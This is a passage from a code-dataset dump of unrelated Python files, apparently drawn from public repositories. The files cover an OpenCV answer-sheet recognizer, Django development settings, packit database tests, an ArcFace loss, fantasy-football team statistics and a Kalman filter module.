影响其中保存的数据。\"\"\"","sub_path":"F_flask/Part4_数据库/demo9_数据库操作.py","file_name":"demo9_数据库操作.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"269046075","text":"# Looping Through A Dictionary.\nuser_0 = {\n\t'username': 'efermi',\n\t'first': 'enrico',\n\t'last': 'fermi',\n\t}\n\n# To see all information stored in dictionary use a for loop.\nfor key, value in user_0.items():\n\tprint(f\"\\nKey: {key}\")\n\tprint(f\"Value: {value}\")\n# items() method following the name of the dictionary returns a list of key- \\\n# value pairs.\n\n# Many users. Dictionary inside a dictionary.\nusers = {\n\t'aeinstein': {\n\t\t'first': 'albert',\n\t\t'last': 'einstein',\n\t\t'location': 'princeton',\n\t\t},\n\t'mcurie': {\n\t\t'first': 'marie',\n\t\t'last': 'curie',\n\t\t'location': 'paris',\n\t\t},\n\t}\n\nfor username, user_info in users.items():\n\tprint(f\"\\nUsername: {username}\")\n\tfull_name = f\"{user_info['first']} {user_info['last']}\"\n\tlocation = user_info['location']\n\n\tprint(f\"\\tFull Name: {full_name.title()}\")\n\tprint(f\"\\tLocation: {location.title()}\")","sub_path":"user_ch6.py","file_name":"user_ch6.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"3221596","text":"import cv2\nimport imutils\nimport numpy as np\n\nfrom utils import helper\n\n\ndef recoginze(filename, opt, dst=None):\n image = cv2.imread(filename, 0)\n\n image = cv2.GaussianBlur(image, (5, 5), 0)\n image = helper.adjust_gamma(image, opt['gamma'])\n\n maso, de, dapan = '', '', []\n\n if opt['detect_conners'] == 1:\n image = helper.detect_conners(image)\n\n if image is None:\n print(\"ERROR\")\n return maso, de, dapan\n\n image = cv2.resize(image, (opt['width'], opt['height']))\n\n h, w = image.shape[:2]\n ratio = h / w\n h_new = 500\n w_new = int(h_new / ratio)\n\n maso_cols = opt['num_maso']\n made_cols = opt['num_made']\n top = opt['top']\n bot = opt['bottom']\n left1 = opt['left_1']\n left2 = opt['left_2']\n dapan_sec = opt['dapan_sec']\n maso_sec = opt['maso_sec']\n dapan_each = opt['dapan_each']\n warpeds = [\n [top, bot, int(w * dapan_sec['sec_1']['left']), int(w * dapan_sec['sec_1']['right'])],\n [top + 10, bot, int(w * dapan_sec['sec_2']['left']), int(w * dapan_sec['sec_2']['right'])],\n [top + 10, bot, int(w * dapan_sec['sec_3']['left']), int(w * dapan_sec['sec_3']['right'])],\n [top, bot, int(w * dapan_sec['sec_4']['left']), int(w * dapan_sec['sec_4']['right'])],\n [maso_sec['top'], maso_sec['bot'], int(w * maso_sec['left']), int(w * maso_sec['right'])]\n ]\n\n count = 0\n cau = 1\n error = False\n error_msg = []\n for index, warp in enumerate(warpeds):\n try:\n warped = image[warp[0]:warp[1], warp[2]:warp[3]]\n warped = helper.adjust_gamma(warped, 0.8)\n\n thresh = cv2.threshold(warped, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n\n cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if imutils.is_cv2() else cnts[1]\n\n cnt_dict = {}\n cntsl = []\n for c in cnts:\n (x, y, w, h) = cv2.boundingRect(c)\n ar = w / float(h)\n\n if w >= 18 and h >= 18 and 0.6 <= ar <= 1.7 and x > 0 and y > 0:\n mask = np.zeros(thresh.shape, dtype=\"uint8\")\n\n cv2.drawContours(mask, [c], -1, 255, -1)\n\n mask = cv2.bitwise_and(thresh, thresh, mask=mask)\n total = cv2.countNonZero(mask)\n\n cnt_dict[str(x) + '-' + str(y)] = total\n cntsl.append((x, y))\n\n cntsl = sorted(cntsl, key=lambda x: x[1])\n cntsl, cnt_dict = helper.normalize_y(cntsl, cnt_dict)\n\n if index >= 4:\n step = maso_cols + made_cols\n else:\n step = 4\n\n cntsl = helper.sort_x(cntsl)\n cntsc, cnt_dict = helper.clean(cntsl, cnt_dict, step=step)\n if index >= 4:\n skip = 0\n for c in cntsc[1:step]:\n if c[1] == cntsc[0][1]:\n skip += 1\n else:\n cntsc = cntsc[skip:]\n break\n if cntsc[0][1] != cntsc[1][1]:\n rot_x = warp[2] + cntsc[1][0] + 60\n rot_y = warp[0] + cntsc[1][1] - 20\n else:\n rot_x = warp[2] + cntsc[0][0] + 60\n rot_y = warp[0] + cntsc[0][1] - 20\n rot_x1 = rot_x - left1\n rot_y1 = rot_y\n rot_x2 = rot_x\n rot_y2 = rot_y + 600\n cv2.rectangle(image, (rot_x1, rot_y1), (rot_x2, rot_y2), (0, 0, 0), 5)\n\n cntscc = []\n for j, c in enumerate(cntsc):\n x, y = c\n\n if not (rot_x1 < warp[2] + x < rot_x2 and rot_y1 < warp[0] + y < rot_y2):\n continue\n\n cntscc.append((x, y))\n\n sec = maso_cols + made_cols\n if len(cntscc) <= sec * 10 - 6:\n error = True\n cntsl = sorted(cntscc, key=lambda kk: kk[1])\n cntsc, cnt_dict = helper.normalize_x(cntsl, cnt_dict, step=step, num_sec=sec * 10)\n\n result_dict = {}\n row = -1\n for i, c in enumerate(cntsc):\n x, y = c\n\n total = cnt_dict[str(x) + '-' + str(y)]\n\n col = i % sec\n if col == 0:\n row += 1\n\n if col % 2 != 0:\n threshold = helper.THRESHOLD\n else:\n threshold = helper.THRESHOLDH\n\n # cv2.putText(image, str(total), (warp[2] + x, warp[0] + y),\n # cv2.FONT_HERSHEY_SIMPLEX, 0.75,\n # (0, 0, 255), 3, cv2.LINE_AA)\n\n try:\n curr = result_dict[i % sec][0]\n if total > curr and total >= threshold:\n result_dict[i % sec] = (total, row)\n\n cv2.putText(image, str(row), (warp[2] + x, warp[0] + y),\n cv2.FONT_HERSHEY_SIMPLEX, 1.5,\n (0, 0, 255), 3, cv2.LINE_AA)\n except KeyError as _:\n result_dict[i % sec] = (total, row)\n if total >= threshold:\n cv2.putText(image, str(row), (warp[2] + x, warp[0] + y),\n cv2.FONT_HERSHEY_SIMPLEX, 1.5,\n (0, 0, 255), 3, cv2.LINE_AA)\n\n for i in range(maso_cols):\n try:\n maso += str(result_dict[maso_cols + made_cols - 1 - i][1])\n except KeyError as _:\n error = True\n error_msg.append('Lỗi ko có mã số ở cột ' + str(i))\n maso += '0'\n\n for i in range(made_cols):\n try:\n de += str(result_dict[made_cols - 1 - i][1])\n except KeyError as _:\n error = True\n error_msg.append('Lỗi ko có đề ở cột ' + str(maso_cols + i))\n de += '0'\n\n else:\n if cntsc[0][1] != cntsc[1][1]:\n rot_x = warp[2] + cntsc[1][0] + 60\n rot_y = warp[0] + cntsc[1][1] - 20\n else:\n rot_x = warp[2] + cntsc[0][0] + 60\n rot_y = warp[0] + cntsc[0][1] - 20\n rot_x1 = rot_x - left2\n rot_y1 = rot_y\n rot_x2 = rot_x\n rot_y2 = rot_y + 1300\n cv2.rectangle(image, (rot_x1, rot_y1), (rot_x2, rot_y2), (0, 0, 0), 5)\n\n cntscc = []\n for j, c in enumerate(cntsc):\n x, y = c\n\n if not (rot_x1 < warp[2] + x < rot_x2 and rot_y1 < warp[0] + y < rot_y2):\n continue\n\n cntscc.append((x, y))\n\n if len(cntscc) <= dapan_each * 4 - 6:\n error = True\n\n cntsl = sorted(cntscc, key=lambda kk: kk[1])\n cntsc, cnt_dict = helper.normalize_x(cntsl, cnt_dict, step=step, num_sec=dapan_each * 4)\n\n bubbled = (helper.THRESHOLD, 99)\n yy = 3\n prev = None\n cx, cy = None, None\n row = 0\n for i, c in enumerate(cntsc):\n x, y = c\n\n if not (rot_x1 < warp[2] + x < rot_x2 and rot_y1 < warp[0] + y < rot_y2):\n continue\n\n if cx is None or cy is None:\n cx, cy = x, y\n\n if (count + 1) % 4 == 0 and prev is not None and prev[1] != y:\n answer = helper.ANSWER_KEY[99]\n dapan.append({\"cau\": str(cau), \"answer\": answer})\n cv2.putText(image, answer, (warp[2] + prev[0], warp[0] + prev[1]),\n cv2.FONT_HERSHEY_SIMPLEX, 1.5,\n (0, 0, 255), 3, cv2.LINE_AA)\n\n if row % 2 != 0:\n bubbled = (helper.THRESHOLD, 99)\n else:\n bubbled = (helper.THRESHOLDH, 99)\n cau += 1\n yy = 3\n count += 1\n\n total = cnt_dict[str(x) + '-' + str(y)]\n\n if bubbled is not None and total >= bubbled[0]:\n bubbled = (total, yy)\n cx, cy = x, y\n\n # cv2.putText(image, str(total), (warp[2] + x, warp[0] + y),\n # cv2.FONT_HERSHEY_SIMPLEX, 0.9,\n # (0, 0, 255), 2, cv2.LINE_AA)\n\n count += 1\n yy -= 1\n if count % 4 == 0:\n if bubbled is not None:\n k = bubbled[1]\n if k != 99:\n answer = helper.ANSWER_KEY[k % 4]\n else:\n answer = helper.ANSWER_KEY[k]\n cx, cy = x - 40, y\n else:\n answer = helper.ANSWER_KEY[99]\n cx, cy = x - 40, y\n\n dapan.append({\"cau\": str(cau), \"answer\": answer})\n cv2.putText(image, answer, (warp[2] + cx, warp[0] + cy),\n cv2.FONT_HERSHEY_SIMPLEX, 1.5,\n (0, 0, 255), 3, cv2.LINE_AA)\n\n if row % 2 != 0:\n bubbled = (helper.THRESHOLD, 99)\n else:\n bubbled = (helper.THRESHOLDH, 99)\n cau += 1\n row += 1\n yy = 3\n\n prev = c\n\n if row > dapan_each:\n row = 0\n\n if cau > opt['num_cau']:\n break\n\n cv2.rectangle(image, (warp[2], warp[0]), (warp[3], warp[1]), (0, 0, 0), 2)\n\n except Exception as e:\n print(e)\n continue\n\n if error is True:\n print(\"ERROR\")\n return 'error', 'error', []\n elif dst is not None:\n image = cv2.resize(image, (w_new, h_new))\n cv2.imwrite(filename, image)\n\n return maso, de, dapan\n","sub_path":"utils/recoginze_one.py","file_name":"recoginze_one.py","file_ext":"py","file_size_in_byte":10726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"350295115","text":"x = input().split(' ')\na = int(x[0])\nb = int(x[1])\ncont = 1\nwhile b < 1:\n if b < 1:\n b = int(x[1+cont])\n cont+=1\n if b > 0:\n break\nsoma = 0\nvb = b\nvar = 0\nwhile True:\n if vb > 0:\n soma += a + var\n var+=1\n vb-=1\n if vb==0:\n break\nprint(soma)\n","sub_path":"inteiros_consecutivos.py","file_name":"inteiros_consecutivos.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"494380417","text":"# Copyright (c) 2015, Alphamonak Solutions Ltd. \n# License: GNU General Public License v3. See license.txt\n\nfrom __future__ import unicode_literals\nimport redapp\nfrom redapp.utils import cstr, filter_strip_join\nfrom redapp.website.website_generator import WebsiteGenerator\nfrom redapple.utilities.address_and_contact import load_address_and_contact\n\nclass SalesPartner(WebsiteGenerator):\n\twebsite = redapp._dict(\n\t\tpage_title_field = \"partner_name\",\n\t\tcondition_field = \"show_in_website\",\n\t\ttemplate = \"templates/generators/sales_partner.html\"\n\t)\n\n\tdef onload(self):\n\t\t\"\"\"Load address and contacts in `__onload`\"\"\"\n\t\tload_address_and_contact(self, \"sales_partner\")\n\n\tdef autoname(self):\n\t\tself.name = self.partner_name\n\n\tdef validate(self):\n\t\tself.parent_website_route = \"partners\"\n\t\tsuper(SalesPartner, self).validate()\n\t\tif self.partner_website and not self.partner_website.startswith(\"http\"):\n\t\t\tself.partner_website = \"http://\" + self.partner_website\n\n\tdef get_contacts(self, nm):\n\t\tif nm:\n\t\t\treturn redapp.db.convert_to_lists(redapp.db.sql(\"\"\"\n\t\t\t\tselect name, CONCAT(IFNULL(first_name,''),\n\t\t\t\t\t' ',IFNULL(last_name,'')),contact_no,email_id\n\t\t\t\tfrom `tabContact` where sales_partner = %s\"\"\", nm))\n\t\telse:\n\t\t\treturn ''\n\n\tdef get_context(self, context):\n\t\taddress = redapp.db.get_value(\"Address\",\n\t\t\t{\"sales_partner\": self.name, \"is_primary_address\": 1},\n\t\t\t\"*\", as_dict=True)\n\t\tif address:\n\t\t\tcity_state = \", \".join(filter(None, [address.city, address.state]))\n\t\t\taddress_rows = [address.address_line1, address.address_line2,\n\t\t\t\tcity_state, address.pincode, address.country]\n\n\t\t\tcontext.update({\n\t\t\t\t\"email\": address.email_id,\n\t\t\t\t\"partner_address\": filter_strip_join(address_rows, \"\\n
    \"),\n\t\t\t\t\"phone\": filter_strip_join(cstr(address.phone).split(\",\"), \"\\n
    \")\n\t\t\t})\n\n\t\treturn context\n","sub_path":"redapple/setup/doctype/sales_partner/sales_partner.py","file_name":"sales_partner.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"248317062","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\n\nhere = lambda * x: os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(__file__)), *x))\n\nPROJECT_NAME = 'src'\nPROJECT_ROOT = here('../..')\n\nroot = lambda * x: os.path.abspath(os.path.join(os.path.abspath(PROJECT_ROOT), *x))\n\nsys.path.insert(0, root('src'))\nsys.path.insert(0, PROJECT_ROOT)\nsys.path.insert(0, root('apps'))\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nADMINS = []\nMANAGERS = ADMINS\n\nAUTH_USER_MODEL = 'profile.User'\n\nDATETIME_FORMAT = 'Y-m-d H:i:s'\nDATE_FORMAT = 'Y-m-d H:i:s'\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'kotel',\n 'USER': 'root',\n 'PASSWORD': '',\n 'HOST': '127.0.0.1',\n 'PORT': '',\n }\n}\n\nALLOWED_HOSTS = []\nTIME_ZONE = 'Asia/Bishkek'\nLANGUAGE_CODE = 'en-us'\nSITE_ID = 1\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nMEDIA_ROOT = os.path.join(PROJECT_ROOT, 'public', 'media')\nSTATIC_ROOT = os.path.join(PROJECT_ROOT, 'public', 'static')\nMEDIA_URL = '/media/'\nSTATIC_URL = '/static/'\nFILE_UPLOAD_MAX_MEMORY_SIZE = 4194304 # 4mb\nUPLOADS_DIR_NAME = 'uploads'\nDEFAULT_CHARSET = 'utf-8'\nANONYMOUS_USER_ID = -1\nLOGIN_URL = '/login/'\nLOGIN_REDIRECT_URL = 'orders:list'\nDOMAIN_NAME = 'http://localhost'\nWWW_ROOT = PROJECT_ROOT\nIS_DEV = False\nIS_PROD = False\n\n# Place order into main stream 15 minutes before\n# it actually should be taken\nDELAYED_MIN_NOTIFY = 900\n\n# Test related stuffs\nTEST_RUNNER = 'django_nose.NoseTestSuiteRunner'\nSOUTH_TESTS_MIGRATE = False # To disable migrations and use syncdb instead\nSKIP_SOUTH_TESTS = True # To disable South's own unit tests\n\n# Get the ENV setting. Needs to be set in .bashrc or similar.\nENV = os.getenv('ENV')\n\nif not ENV:\n raise Exception('Environment variable ENV is requried!')\n\n\nSTATICFILES_DIRS = [\n ('global', root(PROJECT_NAME, 'static')),\n]\n\n\nSTATICFILES_FINDERS = [\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder',\n]\n\n\nSECRET_KEY = 'la7wrs6ov_%qyebo&s__5k37*46sgea2%y+ysx0wx-sy9ir#rl'\n\nTEMPLATE_LOADERS = [\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n]\n\nMIDDLEWARE_CLASSES = [\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nTEMPLATE_CONTEXT_PROCESSORS = [\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.request',\n 'django.core.context_processors.tz',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n\n]\n\n\nROOT_URLCONF = 'urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'src.wsgi.application'\n\nTEMPLATE_DIRS = [root('src', 'templates')]\n\n\nCONTRIB_APPS = [\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n]\n\n\nOTHER_APPS = [\n 'south',\n 'compressor',\n]\n\n\nOUR_APPS = [\n 'profile',\n 'orders',\n]\n\n\n# For Jenkins\nPROJECT_APPS = OUR_APPS\n\nINSTALLED_APPS = CONTRIB_APPS + OTHER_APPS + OUR_APPS\n\nif 'test' in sys.argv:\n COVER_APPS = ','.join(sys.argv[2:])\nelse:\n COVER_APPS = ','.join(OUR_APPS)\n\n\n\nZLIB_COMPRESSION_LEVEL = 2 # Compression level for zlib to provide data for navigators\n\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n\ndef extend_list_avoid_repeats(list_to_extend, extend_with):\n \"\"\"\n Extends the first list with the elements in the second one,\n making sure its elements are not already there in the original list.\n \"\"\"\n list_to_extend.extend(filter(lambda x: not list_to_extend.count(x), extend_with))\n","sub_path":"src/settings/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"444799383","text":"# MIT License\n#\n# Copyright (c) 2018-2020 Red Hat, Inc.\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\"\"\"\nThese tests require a psql database with a schema:\n```\nexport POSTGRESQL_USER=packit\nexport POSTGRESQL_PASSWORD=secret-password\nexport POSTGRESQL_DATABASE=packit\nexport POSTGRESQL_SERVICE_HOST=0.0.0.0\n$ docker-compose -d postgres\n$ alembic upgrade head\n```\n\"\"\"\nfrom datetime import datetime, timedelta\n\nimport pytest\nfrom sqlalchemy.exc import ProgrammingError\n\nfrom packit_service.models import (\n CoprBuild,\n get_sa_session,\n SRPMBuild,\n PullRequest,\n GitProject,\n)\n\nTARGET = \"fedora-42-x86_64\"\n\n\ndef clean_db():\n with get_sa_session() as session:\n session.query(CoprBuild).delete()\n session.query(PullRequest).delete()\n session.query(GitProject).delete()\n\n\n@pytest.fixture()\ndef a_copr_build():\n with get_sa_session() as session:\n session.query(CoprBuild).delete()\n srpm_build = SRPMBuild.create(\"asd\\nqwe\\n\")\n yield CoprBuild.get_or_create(\n pr_id=1,\n build_id=\"123456\",\n commit_sha=\"687abc76d67d\",\n repo_name=\"lithium\",\n namespace=\"nirvana\",\n web_url=\"https://copr.something.somewhere/123456\",\n target=TARGET,\n status=\"pending\",\n srpm_build=srpm_build,\n )\n clean_db()\n\n\ndef test_create_copr_build(a_copr_build):\n assert a_copr_build.pr_id == a_copr_build.pr.id\n assert a_copr_build.pr.pr_id == 1\n assert a_copr_build.build_id == \"123456\"\n assert a_copr_build.commit_sha == \"687abc76d67d\"\n assert a_copr_build.pr.project.namespace == \"nirvana\"\n assert a_copr_build.pr.project.repo_name == \"lithium\"\n assert a_copr_build.web_url == \"https://copr.something.somewhere/123456\"\n assert a_copr_build.srpm_build.logs == \"asd\\nqwe\\n\"\n assert a_copr_build.target == TARGET\n assert a_copr_build.status == \"pending\"\n # Since datetime.utcnow() will return different results in every time its called,\n # we will check if a_copr_build has build_submitted_time value thats within the past hour\n time_last_hour = datetime.utcnow() - timedelta(hours=1)\n assert a_copr_build.build_submitted_time > time_last_hour\n\n\ndef test_get_copr_build(a_copr_build):\n assert a_copr_build.id\n b = CoprBuild.get_by_build_id(a_copr_build.build_id, TARGET)\n assert b.id == a_copr_build.id\n # let's make sure passing int works as well\n b = CoprBuild.get_by_build_id(int(a_copr_build.build_id), TARGET)\n assert b.id == a_copr_build.id\n b2 = CoprBuild.get_by_id(b.id)\n assert b2.id == a_copr_build.id\n\n\ndef test_copr_build_set_status(a_copr_build):\n assert a_copr_build.status == \"pending\"\n a_copr_build.set_status(\"awesome\")\n assert a_copr_build.status == \"awesome\"\n b = CoprBuild.get_by_build_id(a_copr_build.build_id, TARGET)\n assert b.status == \"awesome\"\n\n\ndef test_copr_build_set_build_logs_url(a_copr_build):\n url = \"https://copr.fp.o/logs/12456/build.log\"\n a_copr_build.set_build_logs_url(url)\n assert a_copr_build.build_logs_url == url\n b = CoprBuild.get_by_build_id(a_copr_build.build_id, TARGET)\n assert b.build_logs_url == url\n\n\ndef test_get_or_create_pr():\n clean_db()\n with get_sa_session() as session:\n try:\n expected_pr = PullRequest.get_or_create(\n pr_id=42, namespace=\"clapton\", repo_name=\"layla\"\n )\n actual_pr = PullRequest.get_or_create(\n pr_id=42, namespace=\"clapton\", repo_name=\"layla\"\n )\n\n assert session.query(PullRequest).count() == 1\n assert expected_pr.project_id == actual_pr.project_id\n\n expected_pr = PullRequest.get_or_create(\n pr_id=42, namespace=\"clapton\", repo_name=\"cocaine\"\n )\n actual_pr = PullRequest.get_or_create(\n pr_id=42, namespace=\"clapton\", repo_name=\"cocaine\"\n )\n\n assert session.query(PullRequest).count() == 2\n assert expected_pr.project_id == actual_pr.project_id\n finally:\n clean_db()\n\n\ndef test_errors_while_doing_db():\n with get_sa_session() as session:\n try:\n try:\n PullRequest.get_or_create(pr_id=\"nope\", namespace=\"\", repo_name=False)\n except ProgrammingError:\n pass\n assert len(session.query(PullRequest).all()) == 0\n PullRequest.get_or_create(pr_id=111, namespace=\"asd\", repo_name=\"qwe\")\n assert len(session.query(PullRequest).all()) == 1\n finally:\n clean_db()\n","sub_path":"tests_requre/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":5602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"255868764","text":"import torch, numpy as np\n\n\"\"\"=================================================================================================\"\"\"\nALLOWED_MINING_OPS = None\nREQUIRES_BATCHMINER = False\nREQUIRES_OPTIM = True\n\n### This implementation follows the pseudocode provided in the original paper.\nclass Criterion(torch.nn.Module):\n def __init__(self, opt):\n \"\"\"\n Args:\n margin: Triplet Margin.\n \"\"\"\n super(Criterion, self).__init__()\n self.par = opt\n\n self.angular_margin = opt.loss_arcface_angular_margin\n self.feature_scale = opt.loss_arcface_feature_scale\n\n self.class_map = torch.nn.Parameter(torch.Tensor(opt.n_classes, opt.embed_dim))\n stdv = 1. / np.sqrt(self.class_map.size(1))\n self.class_map.data.uniform_(-stdv, stdv)\n\n self.name = 'arcface'\n\n self.lr = opt.loss_arcface_lr\n\n def forward(self, batch, labels, **kwargs):\n \"\"\"\n Args:\n batch: torch.Tensor: Input of embeddings with size (BS x DIM)\n labels: nparray/list: For each element of the batch assigns a class [0,...,C-1], shape: (BS x 1)\n \"\"\"\n bs, labels = len(batch), labels.to(self.par.device)\n\n class_map = torch.nn.functional.normalize(self.class_map, dim=1)\n #Note that the similarity becomes the cosine for normalized embeddings. Denoted as 'fc7' in the paper pseudocode.\n cos_similarity = batch.mm(class_map.T).clamp(min=1e-10, max=1-1e-10)\n\n pick = torch.zeros(bs, self.par.n_classes).byte().to(self.par.device)\n pick[torch.arange(bs), labels] = 1\n\n original_target_logit = cos_similarity[pick]\n\n theta = torch.acos(original_target_logit)\n marginal_target_logit = torch.cos(theta + self.angular_margin)\n\n class_pred = self.feature_scale * (cos_similarity + (marginal_target_logit-original_target_logit).unsqueeze(1))\n loss = torch.nn.CrossEntropyLoss()(class_pred, labels)\n\n return loss\n","sub_path":"criteria/arcface.py","file_name":"arcface.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"349846870","text":"#!/usr/bin/env python\n\n\"\"\"Class to handle statistics for each team\"\"\"\n\nimport logging\n\n__author__ = 'Ryne Carbone'\n\nlogger = logging.getLogger(__name__)\n\n\nclass TeamStats:\n '''Keep track of team stats'''\n def __init__(self, data):\n self.faab = data['teamTransactions']['acquisitionBudgetSpent']\n self.trans = data['teamTransactions']['overallAcquisitionTotal']\n self.trades = data['teamTransactions']['trades']\n self.waiver = data['waiverRank']\n self.wins = 0.\n self.losses = 0.\n self.streak = 0.\n self.streak_sgn = 1.\n self.pointsFor = 0.\n self.pointsAgainst = 0.\n self.schedule = []\n self.home_away = [] # 0: home 1: away \n self.scores = []\n self.mov = []\n self.awp = 0.\n self.awins = 0.\n self.alosses = 0.\n def __repr__(self):\n print(' FAAB : %s'%self.faab) \n print(' Transactions : %s'%self.trans) \n print(' Trades : %s'%self.trades) \n print(' Waiver : %s'%self.wavier) \n print(' Wins : %s'%self.wins) \n print(' Losses : %s'%self.losses) \n print(' Streak : %s'%self.streak) \n print(' Streak Sign : %s'%self.streak_sgn) \n print(' Points For : %s'%self.pointsFor) \n print(' Points Against : %s'%self.pointsAgainst) \n print(' Schedule : %s'%self.schedule) \n print('Home (0) Away (1) : %s'%self.home_away) \n print(' Scores : %s'%self.scores) \n print('Margin of Victory : %s'%self.mov) \n print(' Aggregate wpct : %s'%self.awp) \n print(' Aggregate wins : %s'%self.awins) \n print(' Aggregate losses : %s'%self.alosses)\n def _replace_opponents(self, teams):\n '''Replace team id number with team object'''\n logger.debug('Replacing opponents in team schedule')\n for week, matchup in enumerate(self.schedule):\n for opponent in teams:\n if matchup == opponent.teamId:\n self.schedule[week] = opponent\n def _calc_mov(self):\n '''Calculate the margin of victory'''\n logger.debug('Calculating the margin of victory for each game in schedule')\n for week, opponent in enumerate(self.schedule):\n mov = self.scores[week] - opponent.stats.scores[week]\n self.mov.append(mov)\n def _calc_wins_losses(self,teamId, week, teams):\n '''Recalculates based on specified week:\n points for, points against\n wins, losses, streak\n aggregate wins, aggregate losses,\n aggregate wpct'''\n logger.debug('Recalculating points, wins/losses, aggregate wins/losses based on week')\n self.awins = 0. # aggregate wins\n self.alosses = 0. # aggregate losses\n self.pointsFor = 0. # points for\n self.pointsAgainst = 0. # points against\n self.wins = 0\n self.losses = 0\n self.streak = 0 # streak\n self.streak_sgn = 1 # sign of streak\n # Loop over weeks, retreive score and week's opponent\n for w, (s, w_o) in enumerate(zip(self.scores[:week], self.schedule[:week])):\n # points for, against, wins, losses, streak, sign\n self.pointsFor += s\n self.pointsAgainst += w_o.stats.scores[w]\n # Score more than opponent\n if s > w_o.stats.scores[w]:\n self.wins += 1\n if self.streak_sgn == -1:\n self.streak_sgn = 1\n self.streak = 1\n else: self.streak += 1\n # Score less than opponent\n else:\n self.losses += 1\n if self.streak_sgn == 1:\n self.streak_sgn = -1\n self.streak = 1\n else: self.streak += 1\n # aggregate wins/losses\n for o in teams:\n if o.teamId != teamId:\n if s > o.stats.scores[w]:\n self.awins += 1\n else:\n self.alosses += 1\n # Update aggregate win pct\n self.awp = float(self.awins)/(float(self.awins)+float(self.alosses))\n","sub_path":"power_ranker/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"461931738","text":"'''\n.. module:: kf.fast_2\n\n :synopsis: LKFFB implementation leveraging speed of kf.fast (memoryless filtering) but\n retaining some information about state variables. Facilitates exploration of different\n Prediction methods ('ZeroGain' or 'PropForward') and maximallly generic choices\n of apriori basis for LKFFB (Basis 'A', 'B', or 'C').\n\n Module Level Functions:\n ----------------------\n makePropForward : Return learned parameters from\n msmt_record via LKFFB and make predictions for timesteps > n_train.\n detailed_kf : Return LKFFB predictions and spectral amplitude information\n and save light LKFFB analysis as .npz file.\n\n.. moduleauthor:: Riddhi Gupta \n\n'''\nimport numpy as np\n#import numba as nb\nimport numpy.linalg as la\n\nfrom kf.common import (\n calc_inst_params, calc_pred, calc_Gamma, get_dynamic_model,\n propagate_states, calc_Kalman_Gain, calc_residuals\n)\n\n#@nb.jit(nopython=True) \ndef makePropForward(freq_basis_array, x_hat, Delta_T_Sampling, phase_correction_noisetraces, num, n_train, numf):\n ''' Extracts learned parameters from Kalman Filtering msmt_record and makes\n predictions for timesteps > n_train.\n\n 